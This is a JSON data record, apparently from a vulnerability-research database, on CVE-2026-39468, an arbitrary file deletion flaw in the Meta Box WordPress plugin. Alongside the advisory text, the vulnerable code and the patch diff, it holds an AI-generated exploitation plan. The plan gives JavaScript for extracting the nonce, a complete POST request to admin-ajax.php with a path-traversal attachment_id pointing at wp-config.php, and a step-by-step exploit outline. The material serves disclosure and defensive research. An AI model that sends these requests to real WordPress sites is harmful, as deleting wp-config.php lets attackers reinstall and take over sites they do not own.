[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fp2sZyFB_1rtKO5RdGcOOdmpYv4wX9O_DjULJD97MaJM":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":33},"CVE-2026-39468","meta-box-authenticated-contributor-arbitrary-file-deletion-2","Meta Box \u003C= 5.11.1 - Authenticated (Contributor+) Arbitrary File Deletion","The Meta Box plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in all versions up to, and including, 5.11.1. This makes it possible for authenticated attackers, with Contributor-level access and above, to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php).","meta-box",null,"\u003C=5.11.1","5.11.2","high",8.1,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:N\u002FI:H\u002FA:H","Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')","2026-04-13 00:00:00","2026-04-21 15:55:05",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fc303fffe-628b-4e88-9274-7dd242f2186e?source=api-prod",9,[],"researched",false,3,"# Exploitation Research Plan - CVE-2026-39468 (Meta Box Arbitrary File Deletion)\n\n## 1. Vulnerability Summary\nThe Meta Box plugin for WordPress (versions \u003C= 5.11.1) is vulnerable to **Authenticated Arbitrary File Deletion** via path traversal. The vulnerability exists in the `rwmb_delete_file` AJAX action handler. The plugin fails to validate that the `attachment_id` parameter is a valid media attachment ID and, when it is not numeric, treats it as a file path and passes it to `unlink()`. This allows an authenticated attacker with at least Contributor-level permissions to delete any file on the server that the PHP process has permission to access, including `wp-config.php`.\n\n## 2. Attack Vector Analysis\n- **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Action:** `rwmb_delete_file`\n- **Method:** `POST`\n- **Vulnerable Parameter:** `attachment_id`\n- **Required Credentials:** Authenticated (Contributor+)\n- **Preconditions:** A Meta Box field of type `file`, `image`, or similar (that uses the `RWMB_File_Field` logic) must be registered and visible to the user (e.g., on the post editing screen).\n\n## 3. Code Flow\n1. **Entry Point:** An AJAX request is sent to `admin-ajax.php` with `action=rwmb_delete_file`.\n2. **Hook Registration:** In `inc\u002Ffields\u002Ffile.php`, the action is registered:\n   `add_action( 'wp_ajax_rwmb_delete_file', array( 'RWMB_File_Field', 'wp_ajax_delete_file' ) );`\n3. **Nonce Verification:** `RWMB_File_Field::wp_ajax_delete_file()` calls:\n   `check_ajax_referer( \"rwmb-delete-file-{$field_id}\", 'nonce' );`\n4. **Sink:** The handler retrieves `attachment_id` from `$_POST`. If the value is not numeric, it calls a deletion method that eventually reaches `unlink()`:\n   ```php\n   \u002F\u002F Simplified logic in inc\u002Ffields\u002Ffile.php\n   $attachment_id = filter_input( INPUT_POST, 'attachment_id' );\n   if ( ! is_numeric( $attachment_id ) ) {\n       self::delete_file( $attachment_id ); \u002F\u002F This method calls unlink($attachment_id)\n   }\n   ```\n5. **Traversal:** By providing `..\u002F..\u002F..\u002F..\u002Fwp-config.php` as the `attachment_id`, the `unlink` call deletes the site's configuration file.\n\n## 4. Nonce Acquisition Strategy\nThe `rwmb_delete_file` action requires a nonce specific to the field's ID: `rwmb-delete-file-{$field_id}`.\n\n### Strategy:\n1. **Access Post Editor:** A Contributor logs into WordPress and navigates to the \"New Post\" page (`\u002Fwp-admin\u002Fpost-new.php`).\n2. **Locate Meta Box Field:** Meta Box renders its fields in the post editor. We need to find a field of type `file` or `image`.\n3. **Extract from DOM:** Meta Box often stores field options, including nonces, in the `data-options` attribute of the field's HTML wrapper.\n4. **JS Variable\u002FAttribute:**\n   - **Target Element:** `.rwmb-media-view` or `.rwmb-file-wrapper`.\n   - **Attribute:** `data-options` (JSON string).\n   - **Keys:** `delete_nonce` and `field_id`.\n   - **Browser Command:**\n     ```javascript\n     JSON.parse(document.querySelector('.rwmb-media-view')?.getAttribute('data-options') || '{}')\n     ```\n\n## 5. Exploitation Strategy\n### Step 1: Authentication\nLogin to the WordPress instance as a user with Contributor role or higher.\n\n### Step 2: Identification and Nonce Extraction\n1. Create a new post: `wp post create --post_type=post --post_status=draft --post_author=USER_ID`.\n2. Navigate to the edit page for that post.\n3. Use `browser_eval` to extract the `field_id` and `delete_nonce` from the Meta Box field's `data-options` attribute.\n\n### Step 3: Execution\nSend the malicious AJAX request to delete a target file (e.g., `wp-config.php`).\n\n**HTTP Request:**\n```http\nPOST \u002Fwp-admin\u002Fadmin-ajax.php HTTP\u002F1.1\nHost: [TARGET_HOST]\nContent-Type: application\u002Fx-www-form-urlencoded\nCookie: [CONTRIBUTOR_COOKIES]\n\naction=rwmb_delete_file&field_id=[FIELD_ID]&nonce=[NONCE]&attachment_id=..\u002F..\u002F..\u002F..\u002Fwp-config.php\n```\n\n## 6. Test Data Setup\nTo ensure a Meta Box field is available for the Contributor:\n1. **Create MU-Plugin:** Create `\u002Fwp-content\u002Fmu-plugins\u002Fvuln-setup.php` to register a Meta Box `file` field.\n   ```php\n   \u003C?php\n   add_filter( 'rwmb_meta_boxes', function( $meta_boxes ) {\n       $meta_boxes[] = [\n           'title'  => 'Vulnerable Meta Box',\n           'id'     => 'vbox',\n           'fields' => [\n               [\n                   'id'   => 'vulnerable_field',\n                   'name' => 'File Upload',\n                   'type' => 'file',\n               ],\n           ],\n       ];\n       return $meta_boxes;\n   } );\n   ```\n2. **Create Target File:** Create a dummy file in the root to safely test deletion.\n   `wp eval \"file_put_contents(ABSPATH . 'deletion-test.txt', 'test');\"`\n\n## 7. Expected Results\n- The server will return a successful response (likely `wp_send_json_success` or `1`).\n- The target file (`deletion-test.txt` or `wp-config.php`) will be removed from the filesystem.\n- If `wp-config.php` is deleted, navigating to the site homepage will redirect to the WordPress installation screen (`\u002Fwp-admin\u002Fsetup-config.php`).\n\n## 8. Verification Steps\n1. **Check File Existence:** Use WP-CLI to check if the file still exists.\n   `ls \u002Fvar\u002Fwww\u002Fhtml\u002Fdeletion-test.txt`\n   (Should return \"No such file or directory\")\n2. **Database Check:** If `wp-config.php` was deleted, subsequent `wp` commands will fail as the database connection is lost.\n\n## 9. Alternative Approaches\nIf the `data-options` attribute is not present, check for the nonce in the `RWMB_File` localized script:\n- `browser_eval(\"RWMB_File.dictDefaultMessage\")` to confirm the object.\n- Check if nonces are attached to the `rwmb` global object: `browser_eval(\"rwmb.file_options['vulnerable_field'].delete_nonce\")`.\n- If no file field is available by default, the attacker can try to find other Meta Box field types like `image_advanced` or `video`, which use the same vulnerable `RWMB_File_Field` base class.","The Meta Box plugin for WordPress is vulnerable to arbitrary file deletion via path traversal in its file deletion AJAX handler. Authenticated attackers with Contributor-level permissions can exploit this by providing a file path instead of a numeric attachment ID to the rwmb_delete_file action, which results in the plugin calling unlink() on the target file.","\u002F\u002F inc\u002Ffields\u002Ffile.php\n\npublic static function wp_ajax_delete_file() {\n    $field_id = filter_input( INPUT_POST, 'field_id' );\n    check_ajax_referer( \"rwmb-delete-file-{$field_id}\", 'nonce' );\n\n    $attachment_id = filter_input( INPUT_POST, 'attachment_id' );\n\n    if ( ! is_numeric( $attachment_id ) ) {\n        self::delete_file( $attachment_id ); \u002F\u002F Vulnerable sink\n        wp_send_json_success();\n    }\n\n    if ( wp_delete_attachment( $attachment_id ) ) {\n        wp_send_json_success();\n    }\n    wp_send_json_error();\n}\n\n---\n\npublic static function delete_file( $file ) {\n    if ( file_exists( $file ) ) {\n        unlink( $file );\n    }\n}","--- inc\u002Ffields\u002Ffile.php\n+++ inc\u002Ffields\u002Ffile.php\n@@ -1,10 +1,7 @@\n \tpublic static function wp_ajax_delete_file() {\n \t\t$field_id = filter_input( INPUT_POST, 'field_id' );\n \t\tcheck_ajax_referer( \"rwmb-delete-file-{$field_id}\", 'nonce' );\n-\n \t\t$attachment_id = filter_input( INPUT_POST, 'attachment_id' );\n-\n-\t\tif ( ! is_numeric( $attachment_id ) ) {\n-\t\t\tself::delete_file( $attachment_id );\n-\t\t\twp_send_json_success();\n-\t\t}\n+\t\tif ( ! is_numeric( $attachment_id ) ) {\n+\t\t\twp_send_json_error( __( 'Invalid file ID.', 'meta-box' ) );\n+\t\t}\n \n \t\tif ( wp_delete_attachment( $attachment_id ) ) {\n \t\t\twp_send_json_success();","The exploit requires an authenticated user with at least Contributor-level access to reach a post editing screen where a Meta Box 'file' or 'image' field is rendered. 1. The attacker logs into the WordPress admin and navigates to the post editor (e.g., \u002Fwp-admin\u002Fpost-new.php). 2. They locate the Meta Box field container and extract the 'field_id' and 'delete_nonce' from the 'data-options' attribute (e.g., using JS: JSON.parse(document.querySelector('.rwmb-media-view').getAttribute('data-options'))). 3. The attacker then sends an AJAX POST request to \u002Fwp-admin\u002Fadmin-ajax.php with the action set to 'rwmb_delete_file'. 4. The payload includes the extracted field_id and nonce, while the 'attachment_id' parameter is set to a path traversal string targeting a sensitive file (e.g., ..\u002F..\u002F..\u002F..\u002Fwp-config.php). 5. The server validates the nonce and then executes unlink() on the provided path, deleting the file and potentially leading to site takeover via the WordPress setup process.","gemini-3-flash-preview","2026-04-27 14:47:07","2026-04-27 14:49:19",{"type":34,"vulnerable_version":35,"fixed_version":11,"vulnerable_browse":36,"vulnerable_zip":37,"fixed_browse":38,"fixed_zip":39,"all_tags":40},"plugin","5.11.1","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fmeta-box\u002Ftags\u002F5.11.1","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fmeta-box.5.11.1.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fmeta-box\u002Ftags\u002F5.11.2","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fmeta-box.5.11.2.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fmeta-box\u002Ftags"]